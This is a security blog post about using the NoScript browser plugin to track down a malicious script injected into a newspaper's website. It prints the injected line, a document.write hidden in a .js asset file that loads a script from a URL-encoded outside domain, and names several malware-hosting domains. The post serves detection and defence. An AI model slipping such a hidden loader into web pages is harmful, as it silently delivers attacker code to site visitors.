I usually suggest that you should use FireFox with the NoScript plugin for safer web browsing. This combo will save you from most web threats. Just remember one rule: Never use the “Allow this page” and the “Allow Scripts Globally” options.
NoScript is also a great helper in revealing tricky website exploits.
Let me use the “Telegram .com” case to show how I use it.
Telegram .com is a website of a Worcester, Ma newspaper. Google currently lists this site as suspicious and many browsers (FireFox3, Safary, Google Chrome) display a warning when you visit this site.
Google’s Safe-Browsing diagnostic page says:
Malicious software is hosted on 3 domain(s), including baidubadu .com/, tibetanpic .com/, dsaff .com/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including xxyou .net/.
I usually start my investigations with Unmask Parasites. It is the fastest and safest way to detect many types of website security issues. However this time the report only stated that Google listed this site as suspicious.
It was time to enable telegram .com in the NoScript menu. I clicked the “Temporarily allow telegram .com“. When the page reloaded I right-clicked on the NoScript icon and found a new suspicious entry in
the menu: “Allow http: //%78%78%79%6F%75%2E%6E%65%74”
I decoded this URL: %78%78%79%6F%75%2E%6E%65%74 = xxyou .net
Bingo! This is the site mentioned as an intermediary on the Google’s diagnostic page.
The fact this domain appeared only after enabling scripts on telegram .com mean that the “xxyou .net” reference was hidden somewhere in .js files on telegram .com web server.
I downloaded (using wget) the .js files. No wonder, at the very bottom of the “/assets/AC_RunActiveContent.js” file I discovered the following code:
document.write('<script src=http: //%78%78%79%6F%75%2E%6E%65%74 /msn.gif></script>');
Hope, despite of this hack, Telegram .com has decent webmasters and sysadmins, and they’ll figure out how their site was infected and will prevent any recurrence. This article is about detection only. (Update: After posting this article, I checked the site again and the malicious script was gone. )
If you know any other NoScript tricks, please share them in the comments section below. If you have any other security related tips and tricks, and want to share them with readers of my blog, you can contact me and offer a guest post.